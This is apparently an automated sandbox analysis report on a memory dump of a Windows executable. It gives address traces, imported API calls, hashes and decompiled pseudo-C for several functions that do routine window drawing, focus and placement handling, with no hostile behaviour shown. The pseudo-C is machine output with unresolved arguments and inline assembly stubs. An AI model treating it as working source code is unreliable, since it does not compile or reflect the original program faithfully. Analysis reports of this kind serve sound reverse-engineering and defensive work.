0x0043437c 0x00000000 0x0043437a 0x0043435e 0x00434305 0x00434305 0x00434305 0x00434308 0x00434381 0x00434385 0x00434389 0x0043438b 0x0043438b 0x00434395 0x00434396 0x00434398 0x0043440f 0x0043440f 0x00434418 0x00000000 0x0043439a 0x0043439a 0x0043439b 0x0043439b 0x0043439d 0x0043439d 0x004343a1 0x004343c7 0x004343a3 0x004343a3 0x004343a6 0x004343a8 0x004343ba 0x004343aa 0x004343b5 0x004343b5 0x004343a8 0x004343cf 0x004343d4 0x004343e0 0x004343e3 0x004343e7 0x00000000 0x00000000 0x0043440b 0x0043440c 0x0043440c 0x0043440d 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x0043440d 0x004343f2 0x004343fa 0x00434401 0x00434401 0x0043430a 0x0043430a 0x0043430b 0x00434775 0x00434776 0x00434778 0x00000000 0x0043477a 0x0043477a 0x0043477b 0x0043477b 0x0043477d 0x00434787 0x0043478f 0x00434792 0x00434795 0x00000000 0x00000000 0x0043479f 0x004347a4 0x004347a6 0x004347b4 0x004347b5 0x004347b5 0x004347b6 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000 0x004347a6 0x004347ad 0x004347ad 0x00434311 0x00000000 0x00434311 0x0043430b 0x00434308 0x00000000 0x004342de 0x004342de 0x0043431c 0x0043431d 0x0043431f 0x00000000 0x00434325 0x00434325 0x00434326 0x00434326 0x00434328 0x0043432d 0x00434336 0x0043433b 0x0043433d 0x00000000 0x00000000 0x00434343 0x00434344 0x00434344 0x00434345 0x00000000 0x00434347 0x00000000 0x00434347 0x00000000 0x00434345 0x00434328 0x00000000 0x004342e0 0x004342e0 0x004342e3 0x00434527 0x00434530 0x00434531 0x00434533 0x00000000 0x00434539 0x00434539 0x0043453a 0x0043453a 0x0043453c 0x00434553 0x00434556 0x0043455a 0x00000000 0x00000000 0x00434622 0x00434623 0x00434623 0x00434624 0x00000000 0x0043462a 0x00000000 0x0043462a 0x00000000 0x00434624 0x0043456c 0x00434571 0x00434572 0x00434577 0x0043457a 0x00434589 0x0043458e 0x0043458f 0x00434594 0x00434597 0x004345a3 0x004345b8 0x004345d1 0x004345d8 0x004345db 0x004345de 0x004345e3 0x004345e8 0x004345fd 0x004345fd 0x004342e9 0x004342e9 0x004342ea 0x00434632 0x0043463b 0x0043463c 0x0043463e 0x00000000 0x00434644 0x00434644 0x00434645 0x00434645 0x00434647 0x0043465e 0x00434661 0x00434665 0x00000000 0x00000000 0x00434765 0x00434766 0x00434766 0x00434767 0x00000000 0x0043476d 0x00000000 0x0043476d 0x00000000 0x00434767 0x00434677 0x00434685 0x00434694 0x004346a2 0x004346ae 0x004346bc 0x004346c5 0x004346da 0x004346f4 0x004346f9 0x004346fc 0x004346ff 0x00434704 0x00434709 0x0043471b 0x0043471b 0x004342f0 0x004342f3 0x00434425 0x0043442e 0x0043442f 0x00434431 0x00000000 0x00434437 0x00434437 0x00434438 0x00434438 0x0043443a 0x00434446 0x00434449 0x0043444c 0x0043444f 0x0043447a 0x00434451 0x0043445e 0x0043445e 0x0043447d 0x00434481 0x00000000 0x00000000 0x00434517 0x00434518 0x00434518 0x00434519 0x00000000 0x0043451f 0x00000000 0x0043451f 0x00000000 0x00434519 0x00434499 0x0043449e 0x004344a0 0x004344a7 0x004344b2 0x004344b4 0x004344b4 0x004344b9 0x004344c1 0x004344c4 0x004344c6 0x004344cc 0x004344ce 0x004344d5 0x004344d5 0x004344e1 0x004344e8 0x00434504 0x0043450d 0x004344ea 0x004344fa 0x004344fa 0x004344e8 0x004344c6 0x004342f9 0x004347b8 0x004347cf 0x004347cf 0x004347d2 0x004347d4 0x004347d7 0x004347da 0x004347e7 0x004347e7 0x004342ea 0x004342e3 0x004342de 0x00000000

APIs

SaveDC.GDI32(?), ref: 00434584 RestoreDC.GDI32(?,?), ref: 004345F8 GetWindowDC.USER32(?,00000000,004347E8), ref: 00434672 SaveDC.GDI32(?), ref: 004346A9 RestoreDC.GDI32(?,?), ref: 00434716 DefWindowProcA.USER32(?,?,?,?,00000000,004347E8), ref: 004347CA

Strings

PSC , xrefs: 00434562, 0043468A

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSaveWindow$Proc String ID: PSC API String ID: 1975259465-3988711711 Opcode ID: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a Instruction ID: e2bc05db2e98f798f29eef0ec9ad69615c0f825a7202cf89475d9a585c1b255b Opcode Fuzzy Hash: 2210b87bf067a1b2d173e421975d82a66dea5aa8cba3087decbb8f719ba20d3a Instruction Fuzzy Hash: E1E14C74A006059FCB10EFA9C5819AEF3F5EF8D304F619166E801A7361C738ED42CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E0044F3A8(intOrPtr __eax, struct HWND__** __edx) { intOrPtr _v8; int _v12; intOrPtr _v16; struct HDC__* _v20; struct HWND__* _v24; void* __ebp; struct HWND__* _t100; intOrPtr _t110; struct HWND__* _t111; intOrPtr _t115; intOrPtr _t116; intOrPtr _t132; intOrPtr _t135; struct HWND__* _t141; struct HWND__* _t144; intOrPtr _t148; struct HWND__* _t149; intOrPtr _t150; intOrPtr _t151; struct HWND__* _t153; struct HWND__* _t156; intOrPtr _t162; intOrPtr _t192; struct HWND__** _t221; void* _t224; struct HWND__* _t242; struct HWND__* _t243; struct HWND__* _t245; void* _t258; void* _t259; intOrPtr _t265; intOrPtr _t273; struct HWND__* _t277; struct HWND__* _t278; struct HWND__* _t279; struct HWND__* _t284; struct HWND__* _t285; struct HWND__* _t286; struct HWND__* _t287; void* _t289; void* _t291; intOrPtr _t292; void* _t294; void* _t298; _t289 = _t291; _t292 = _t291 + 0xffffffec; _t221 = __edx; _v8 = __eax; _t100 = *__edx; _t242 = _t100; _t294 = _t242 - 0x46; if(_t294 > 0) { _t243 = _t242 - 0xb01a; __eflags = _t243; if(_t243 == 0) { __eflags = *(_v8 + 0x94); if(__eflags != 0) { E00403B24(_v8, __eflags); } } else { _t245 = _t243 - 1; __eflags = _t245; if(_t245 == 0) { __eflags = *(_v8 + 0x94); if(__eflags != 0) { E00403B24(_v8, __eflags); } } else { __eflags = _t245 == 0x2c; if(_t245 == 0x2c) { _t284 = __edx[1]; _t277 = 0; while(1) { __eflags = _t284; if(_t284 == 0) { break; } __eflags = _t277; if(_t277 == 0) { _t277 = E0043747C(_t284, _t224); _t284 = GetParent(_t284); continue; } break; } __eflags = _t277; if(_t277 != 0) { _t285 = E0044CE28(_t277); _t110 = _v8; __eflags = _t277 - *((intOrPtr*)(_t110 + 0x268)); if(_t277 != *((intOrPtr*)(_t110 + 0x268))) { L28: __eflags = _t285; if(_t285 != 0) { __eflags = _t285 - _v8; if(_t285 == _v8) { L31: _t111 = *(_t285 + 0x268); __eflags = _t111; if(_t111 != 0) { __eflags = _t277 - _t111; if(_t277 != _t111) { __eflags = 0; E0043BC9C(_t111, 0, 8, 0); } } *((intOrPtr*)(_t285->i + 0xf8))(); } else { _t115 = *0x466584; // 0x26e66a0 __eflags = _t285 - *((intOrPtr*)(_t115 + 0x68)); if(_t285 != *((intOrPtr*)(_t115 + 0x68))) { goto L31; } } } } else { _t116 = *0x466584; // 0x26e66a0 __eflags = _t277 - *((intOrPtr*)(_t116 + 0x64)); if(_t277 != *((intOrPtr*)(_t116 + 0x64))) { goto L28; } } } } else { goto L56; } } } goto L58; } else { if(_t294 == 0) { _t132 = _v8; __eflags = ( *0x44f87c & 0x0000ffff) - ( *(_t132 + 0x1c) & 0x0000ffff & *0x44f878); if(( *0x44f87c & 0x0000ffff) == ( *(_t132 + 0x1c) & 0x0000ffff & *0x44f878)) { _t135 = _v8; __eflags = ( *(_t135 + 0x278) & 0x000000ff) - 0xffffffffffffffff; if(( *(_t135 + 0x278) & 0x000000ff) - 0xffffffffffffffff < 0) { _t148 = _v8; __eflags = *((char*)(_t148 + 0x273)) - 2; if( *((char*)(_t148 + 0x273)) != 2) { _t149 = __edx[2]; _t34 = _t149 + 0x18; *_t34 = *(_t149 + 0x18) | 0x00000002; __eflags = *_t34; } } _t141 = ( *(_v8 + 0x278) & 0x000000ff) - 1; __eflags = _t141; if(_t141 == 0) { L45: _t144 = ( *(_v8 + 0x271) & 0x000000ff) - 2; __eflags = _t144; if(_t144 == 0) { L47: *( *((intOrPtr*)(_t221 + 8)) + 0x18) = *( *((intOrPtr*)(_t221 + 8)) + 0x18) | 0x00000001; } else { __eflags = _t144 == 3; if(_t144 == 3) { goto L47; } } } else { __eflags = _t141 == 2; if(_t141 == 2) { goto L45; } } } goto L58; } else { _t258 = _t242 + 0xfffffffa - 3; if(_t258 < 0) { __eflags = *0x4626c0; if( *0x4626c0 != 0) { __eflags = *__edx - 7; if( *__edx != 7) { goto L58; } else { _t150 = _v8; __eflags = *(_t150 + 0x1c) & 0x00000010; if(( *(_t150 + 0x1c) & 0x00000010) != 0) { goto L58; } else { _t286 = 0; _t151 = _v8; __eflags = *((char*)(_t151 + 0x277)) - 2; if( *((char*)(_t151 + 0x277)) != 2) { _t153 = *(_v8 + 0x268); __eflags = _t153; if(_t153 != 0) { __eflags = _t153 - _v8; if(_t153 != _v8) { _t286 = E004423F8(_t153); } } } else { _t156 = E0045015C(_v8); __eflags = _t156; if(_t156 != 0) { _t286 = E004423F8(E0045015C(_v8)); } } __eflags = _t286; if(_t286 == 0) { goto L58; } else { _t100 = SetFocus(_t286); } } } } goto L59; } else { _t259 = _t258 - 0x22; if(_t259 == 0) { _v24 = __edx[2]; __eflags = _v24->i - 1; if(_v24->i != 1) { goto L58; } else { _t162 = _v8; __eflags = *(_t162 + 0x290); if( *(_t162 + 0x290) == 0) { goto L58; } else { _t278 = E00433324( *((intOrPtr*)(_v8 + 0x290)), 0, *((intOrPtr*)(_v24 + 8))); __eflags = _t278; if(_t278 == 0) { goto L58; } else { _v16 = E004262D8(0, 1); _push(_t289); _push(0x44f6c1); _push( *[fs:eax]); *[fs:eax] = _t292; _v12 = SaveDC( *(_v24 + 0x18)); _push(_t289); _push(0x44f6a4); _push( *[fs:eax]); *[fs:eax] = _t292; E004268A4(_v16, *(_v24 + 0x18)); E00426738(_v16); E00434AAC(_t278, _v24 + 0x1c, _v16, *(_v24 + 0x10) & 0x0000ffff); _pop(_t265); *[fs:eax] = _t265; _push(0x44f6ab); __eflags = 0; E004268A4(_v16, 0); return RestoreDC( *(_v24 + 0x18), _v12); } } } } else { if(_t259 == 1) { _t287 = __edx[2]; __eflags = _t287->i - 1; if(_t287->i != 1) { goto L58; } else { _t192 = _v8; __eflags = *(_t192 + 0x290); if( *(_t192 + 0x290) == 0) { goto L58; } else { _t279 = E00433324( *((intOrPtr*)(_v8 + 0x290)), 0, *((intOrPtr*)(_t287 + 8))); __eflags = _t279; if(_t279 == 0) { goto L58; } else { _v20 = GetWindowDC(E004423F8(_v8)); *[fs:eax] = _t292; _v16 = E004262D8(0, 1); *[fs:eax] = _t292; _v12 = SaveDC(_v20); *[fs:eax] = _t292; E004268A4(_v16, _v20); E00426738(_v16); *((intOrPtr*)(_t279->i + 0x38))(_t287 + 0x10, *[fs:eax], 0x44f7ab, _t289, *[fs:eax], 0x44f7c8, _t289, *[fs:eax], 0x44f7ef, _t289); _pop(_t273); *[fs:eax] = _t273; _push(0x44f7b2); __eflags = 0; E004268A4(_v16, 0); return RestoreDC(_v20, _v12); } } } } else { L56: _t298 = _t100 - *0x46658c; // 0xc075 if(_t298 == 0) { E0043BC9C(_v8, 0, 0xb025, 0); E0043BC9C(_v8, 0, 0xb024, 0); E0043BC9C(_v8, 0, 0xb035, 0); E0043BC9C(_v8, 0, 0xb009, 0); E0043BC9C(_v8, 0, 0xb008, 0); E0043BC9C(_v8, 0, 0xb03d, 0); } L58: _t100 = E0043F7F4(_v8, _t221); L59: return _t100; } } } } } } 0x0044f3a9 0x0044f3ab 0x0044f3b1 0x0044f3b3 0x0044f3b6 0x0044f3b8 0x0044f3ba 0x0044f3bd 0x0044f3e2 0x0044f3e2 0x0044f3e8 0x0044f531 0x0044f538 0x0044f545 0x0044f545 0x0044f3ee 0x0044f3ee 0x0044f3ee 0x0044f3ef 0x0044f510 0x0044f517 0x0044f524 0x0044f524 0x0044f3f5 0x0044f3f5 0x0044f3f8 0x0044f479 0x0044f47c 0x0044f491 0x0044f491 0x0044f493 0x00000000 0x00000000 0x0044f495 0x0044f497 0x0044f487 0x0044f48f 0x00000000 0x0044f48f 0x00000000 0x0044f497 0x0044f499 0x0044f49b 0x0044f4aa 0x0044f4ac 0x0044f4af 0x0044f4b5 0x0044f4c5 0x0044f4c5 0x0044f4c7 0x0044f4cd 0x0044f4d0 0x0044f4e0 0x0044f4e0 0x0044f4e6 0x0044f4e8 0x0044f4ea 0x0044f4ec 0x0044f4f0 0x0044f4f7 0x0044f4f7 0x0044f4ec 0x0044f502 0x0044f4d2 0x0044f4d2 0x0044f4d7 0x0044f4da 0x00000000 0x00000000 0x0044f4da 0x0044f4d0 0x0044f4b7 0x0044f4b7 0x0044f4bc 0x0044f4bf 0x00000000 0x00000000 0x0044f4bf 0x0044f4b5 0x0044f3fa 0x00000000 0x0044f3fa 0x0044f3f8 0x0044f3ef 0x00000000 0x0044f3bf 0x0044f3bf 0x0044f54f 0x0044f564 0x0044f567 0x0044f56d 0x0044f578 0x0044f57a 0x0044f57c 0x0044f57f 0x0044f586 0x0044f588 0x0044f58b 0x0044f58b 0x0044f58b 0x0044f58b 0x0044f586 0x0044f599 0x0044f599 0x0044f59b 0x0044f5a5 0x0044f5af 0x0044f5af 0x0044f5b1 0x0044f5bb 0x0044f5be 0x0044f5b3 0x0044f5b3 0x0044f5b5 0x00000000 0x00000000 0x0044f5b5 0x0044f59d 0x0044f59d 0x0044f59f 0x00000000 0x00000000 0x0044f59f 0x0044f59b 0x00000000 0x0044f3c5 0x0044f3c8 0x0044f3cb 0x0044f3ff 0x0044f406 0x0044f40c 0x0044f40f 0x00000000 0x0044f415 0x0044f415 0x0044f418 0x0044f41c 0x00000000 0x0044f422 0x0044f422 0x0044f424 0x0044f427 0x0044f42e 0x0044f450 0x0044f456 0x0044f458 0x0044f45a 0x0044f45d 0x0044f464 0x0044f464 0x0044f45d 0x0044f430 0x0044f433 0x0044f438 0x0044f43a 0x0044f449 0x0044f449 0x0044f43a 0x0044f466 0x0044f468 0x00000000 0x0044f46e 0x0044f46f 0x0044f46f 0x0044f468 0x0044f41c 0x0044f40f 0x00000000 0x0044f3cd 0x0044f3cd 0x0044f3d0 0x0044f5ca 0x0044f5d0 0x0044f5d3 0x00000000 0x0044f5d9 0x0044f5d9 0x0044f5dc 0x0044f5e3 0x00000000 0x0044f5e9 0x0044f5ff 0x0044f601 0x0044f603 0x00000000 0x0044f609 0x0044f615 0x0044f61a 0x0044f61b 0x0044f620 0x0044f623 0x0044f632 0x0044f637 0x0044f638 0x0044f63d 0x0044f640 0x0044f64c 0x0044f65f 0x0044f677 0x0044f67e 0x0044f681 0x0044f684 0x0044f689 0x0044f68e 0x0044f6a3 0x0044f6a3 0x0044f603 0x0044f5e3 0x0044f3d6 0x0044f3d7 0x0044f6c8 0x0044f6cb 0x0044f6ce 0x00000000 0x0044f6d4 0x0044f6d4 0x0044f6d7 0x0044f6de 0x00000000 0x0044f6e4 0x0044f6f7 0x0044f6f9 0x0044f6fb 0x00000000 0x0044f701 0x0044f70f 0x0044f71d 0x0044f72c 0x0044f73a 0x0044f746 0x0044f754 0x0044f75d 0x0044f770 0x0044f783 0x0044f788 0x0044f78b 0x0044f78e 0x0044f793 0x0044f798 0x0044f7aa 0x0044f7aa 0x0044f6fb 0x0044f6de 0x0044f3dd 0x0044f7f6 0x0044f7f6 0x0044f7fc 0x0044f80a 0x0044f81b 0x0044f82c 0x0044f83d 0x0044f84e 0x0044f85f 0x0044f85f 0x0044f864 0x0044f869 0x0044f86e 0x0044f874 0x0044f874 0x0044f3d7 0x0044f3d0 0x0044f3cb 0x0044f3bf

APIs

SetFocus.USER32(00000000), ref: 0044F46F SaveDC.GDI32(?), ref: 0044F62D RestoreDC.GDI32(?,?), ref: 0044F69E GetWindowDC.USER32(00000000), ref: 0044F70A SaveDC.GDI32(?), ref: 0044F741 RestoreDC.GDI32(?,?), ref: 0044F7A5

Strings

PSC , xrefs: 0044F60B, 0044F722

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: RestoreSave$FocusWindow String ID: PSC API String ID: 1553564791-3988711711 Opcode ID: 72769ad42fed0eb90a27f93b861efb011eea36f8f11b74f6851d10a0e592ddb5 Instruction ID: 0feb47b636321289c6b1ee835d5db488161481ff91a5fcd85071049a3d22871c Opcode Fuzzy Hash: 72769ad42fed0eb90a27f93b861efb011eea36f8f11b74f6851d10a0e592ddb5 Instruction Fuzzy Hash: C9C16030A00204DFEB11EF69C586A6FB7F5EF49704F6544B6E804AB361DB38AE05DB18

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%

E00442700(void* __eax) { void* _v28; struct _WINDOWPLACEMENT _v56; struct tagPOINT _v64; intOrPtr _v68; void* _t43; struct HWND__* _t45; struct tagPOINT* _t47; _t47 = &(_v64.y); _t43 = __eax; if(IsIconic( *(__eax + 0x1b4)) == 0) { GetWindowRect( *(_t43 + 0x1b4), _t47); } else { _v56.length = 0x2c; GetWindowPlacement( *(_t43 + 0x1b4), &_v56); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); } if((GetWindowLongA( *(_t43 + 0x1b4), 0xfffffff0) & 0x40000000) != 0) { _t45 = GetWindowLongA( *(_t43 + 0x1b4), 0xfffffff8); if(_t45 != 0) { ScreenToClient(_t45, _t47); ScreenToClient(_t45, &_v64); } } *(_t43 + 0x40) = _t47->x; *((intOrPtr*)(_t43 + 0x44)) = _v68; *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x; *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68; return L00439F28(_t43); } 0x00442703 0x00442706 0x00442716 0x00442745 0x00442718 0x00442718 0x0044272c 0x00442737 0x00442738 0x00442739 0x0044273a 0x0044273a 0x0044275d 0x0044276d 0x00442771 0x00442775 0x00442780 0x00442780 0x00442771 0x00442788 0x0044278f 0x00442799 0x004427a4 0x004427b4

APIs

IsIconic.USER32(?), ref: 0044270F GetWindowPlacement.USER32(?,0000002C), ref: 0044272C GetWindowRect.USER32 ref: 00442745 GetWindowLongA.USER32 ref: 00442753 GetWindowLongA.USER32 ref: 00442768 ScreenToClient.USER32 ref: 00442775 ScreenToClient.USER32 ref: 00442780

Strings

, , xrefs: 00442718

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect String ID: , API String ID: 2266315723-3772416878 Opcode ID: ce15ff6008579e3d3c35e24131f4f0ecce661e0228d178844c8a078a25dbcd0e Instruction ID: 282360e0af41cb553a3d796231ab277cfe4c42851b7561e00cc4fa463f4feb2e Opcode Fuzzy Hash: ce15ff6008579e3d3c35e24131f4f0ecce661e0228d178844c8a078a25dbcd0e Instruction Fuzzy Hash: EA117C71908340AFDB00DF6DC985A8B37D8AF49314F04467ABE58DB386D739E800CB66

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 57%

E00456830(void* __eax) { struct HWND__* _t21; intOrPtr* _t26; signed int _t29; intOrPtr* _t30; int _t33; intOrPtr _t36; void* _t54; int _t64; _t54 = __eax; _t21 = IsIconic( *(__eax + 0x30)); if(_t21 != 0) { SetActiveWindow( *(_t54 + 0x30)); if( *((intOrPtr*)(_t54 + 0x44)) == 0 || *((char*)(_t54 + 0x5b)) == 0 && *((char*)( *((intOrPtr*)(_t54 + 0x44)) + 0x57)) == 0) { L6: E004554C4( *(_t54 + 0x30), 9, __eflags); } else { _t64 = IsWindowEnabled(E004423F8( *((intOrPtr*)(_t54 + 0x44)))); if(_t64 == 0) { goto L6; } else { DefWindowProcA( *(_t54 + 0x30), 0x112, 0xf120, 0); } } _t26 = *0x462c28; // 0x466310 _t29 = *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1; if(_t64 < 0) { asm("adc eax, 0x0"); } _t30 = *0x462c28; // 0x466310 _t33 = *((intOrPtr*)( *_t30))(0, _t29) >> 1; if(_t64 < 0) { asm("adc eax, 0x0"); } SetWindowPos( *(_t54 + 0x30), 0, _t33, ??, ??, ??, ??); _t36 = *((intOrPtr*)(_t54 + 0x44)); if(_t36 != 0 && *((char*)(_t36 + 0x273)) == 1 && *((char*)(_t36 + 0x57)) == 0) { E00450A04(_t36, 0); E00453454( *((intOrPtr*)(_t54 + 0x44))); } E00455D1C(_t54); L00455DF8(_t54, 1); _t21 = *0x466584; // 0x26e66a0 _t59 = *((intOrPtr*)(_t21 + 0x64)); if( *((intOrPtr*)(_t21 + 0x64)) != 0) { _t21 = SetFocus(E004423F8(_t59)); } if( *((short*)(_t54 + 0x14a)) != 0) { return *((intOrPtr*)(_t54 + 0x148))(); } } return _t21; } 0x00456832 0x00456838 0x0045683f 0x00456849 0x00456852 0x0045688c 0x00456894 0x00456863 0x00456871 0x00456873 0x00000000 0x00456875 0x00456885 0x00456885 0x00456873 0x004568a1 0x004568aa 0x004568ac 0x004568ae 0x004568ae 0x004568b4 0x004568bd 0x004568bf 0x004568c1 0x004568c1 0x004568cb 0x004568d0 0x004568d5 0x004568e8 0x004568f0 0x004568f0 0x004568f7 0x00456900 0x00456905 0x0045690a 0x0045690f 0x00456919 0x00456919 0x00456926 0x00000000 0x00456930 0x00456926 0x00456938

APIs

IsIconic.USER32(?), ref: 00456838 SetActiveWindow.USER32(?,?,?,?,00456232,00000000,00456706), ref: 00456849 IsWindowEnabled.USER32(00000000), ref: 0045686C DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,00456232,00000000,00456706), ref: 00456885 SetWindowPos.USER32(?,00000000,00000000,?,?,00456232,00000000,00456706), ref: 004568CB SetFocus.USER32(00000000,?,00000000,00000000,?,?,00456232,00000000,00456706), ref: 00456919

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledFocusIconicProc String ID: API String ID: 848842217-0 Opcode ID: 1957795f184147772967dd2170243ba8589b1d82c817d7dd23442b436a3c44b5 Instruction ID: 0ae515bd5538cf6c2b81134375036770536a1319b9b68df56a487dd4935c93fd Opcode Fuzzy Hash: 1957795f184147772967dd2170243ba8589b1d82c817d7dd23442b436a3c44b5 Instruction Fuzzy Hash: 68311270B012409BEB14BB69CD85B5A37986F04706F4904BAFD04DF2D7DA7DEC888719

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%

E00441DD4(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) { void* _v20; struct _WINDOWPLACEMENT _v48; char _v64; int _t54; intOrPtr* _t55; int _t60; int _t62; _t60 = __ecx; _t62 = __edx; _t55 = __eax; if(__edx != *((intOrPtr*)(__eax + 0x40)) || __ecx != *((intOrPtr*)(__eax + 0x44)) || _a8 != *((intOrPtr*)(__eax + 0x48))) { L4: if(E004426F4(_t55) == 0 || IsIconic( *(_t55 + 0x1b4)) != 0) { *(_t55 + 0x40) = _t62; *(_t55 + 0x44) = _t60; *((intOrPtr*)(_t55 + 0x48)) = _a8; *((intOrPtr*)(_t55 + 0x4c)) = _a4; if(E004426F4(_t55) != 0) { _v48.length = 0x2c; GetWindowPlacement( *(_t55 + 0x1b4), &_v48); E0043A33C(_t55, &_v64); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); SetWindowPlacement( *(_t55 + 0x1b4), &_v48); } } else { SetWindowPos( *(_t55 + 0x1b4), 0, _t62, _t60, _a8, _a4, 0x14); } L00439F28(_t55); E0043D538(_t55); return *((intOrPtr*)( *_t55 + 0x5c))(); } else { _t54 = _a4; if(_t54 == *((intOrPtr*)(__eax + 0x4c))) { return _t54; } goto L4; } } 0x00441ddd 0x00441ddf 0x00441de1 0x00441de6 0x00441e01 0x00441e0a 0x00441e38 0x00441e3b 0x00441e41 0x00441e47 0x00441e53 0x00441e55 0x00441e67 0x00441e71 0x00441e7c 0x00441e7d 0x00441e7e 0x00441e7f 0x00441e8b 0x00441e8b 0x00441e1c 0x00441e31 0x00441e31 0x00441e92 0x00441e99 0x00000000 0x00441df5 0x00441df5 0x00441dfb 0x00441eab 0x00441eab 0x00000000 0x00441dfb

APIs

IsIconic.USER32(?), ref: 00441E13 SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00441E31 GetWindowPlacement.USER32(?,0000002C), ref: 00441E67 SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00441E8B

Strings

, , xrefs: 00441E55

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Placement$Iconic String ID: , API String ID: 568898626-3772416878 Opcode ID: b3f1f57aaca20093d57be3fc942e497ad33d81fce6295880f164f60f71fd4e0b Instruction ID: 47f25ef3559f560daf95aef17050d8c5e2cd4fbc03fa61df4cfcf949f4803219 Opcode Fuzzy Hash: b3f1f57aaca20093d57be3fc942e497ad33d81fce6295880f164f60f71fd4e0b Instruction Fuzzy Hash: 25215171A002049BDF54EF69C8C099E77A8AF49314F508466FE08EF356D77AEC448BA4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%

E00422EE0(void* __edi, struct HWND__* _a4, signed int _a8) { struct _WINDOWPLACEMENT _v48; void* __ebx; void* __esi; void* __ebp; signed int _t19; intOrPtr _t21; struct HWND__* _t23; _t19 = _a8; _t23 = _a4; if( *0x466339 != 0) { if((_t19 & 0x00000003) == 0) { if(IsIconic(_t23) == 0) { GetWindowRect(_t23, &(_v48.rcNormalPosition)); } else { GetWindowPlacement(_t23, &_v48); } return E00422E50( &(_v48.rcNormalPosition), _t19); } return 0x12340042; } _t21 = *0x466314; // 0x422ee0 *0x466314 = E00422CE4(1, _t19, _t21, __edi, _t23); return *0x466314(_t23, _t19); } 0x00422ee8 0x00422eeb 0x00422ef5 0x00422f1f 0x00422f30 0x00422f43 0x00422f32 0x00422f37 0x00422f37 0x00000000 0x00422f4d 0x00000000 0x00422f21 0x00422efc 0x00422f09 0x00000000

Strings

MonitorFromWindow , xrefs: 00422EF7 .B , xrefs: 00422EFC, 00422F09, 00422F10

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc String ID: MonitorFromWindow$.B API String ID: 190572456-3321143411 Opcode ID: dc8e35c407d82f6cceb83babe80fce9656be7aefb26f434311fe2d54a7a81e81 Instruction ID: 1636fd834bafad5518785d76de514a437e7accc22a945f91af0d7936cae42485 Opcode Fuzzy Hash: dc8e35c407d82f6cceb83babe80fce9656be7aefb26f434311fe2d54a7a81e81 Instruction Fuzzy Hash: 43018471A041687A9700EB54AF819AFB36CAB05304BC1412BF914A3242EBA89D0197BF

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

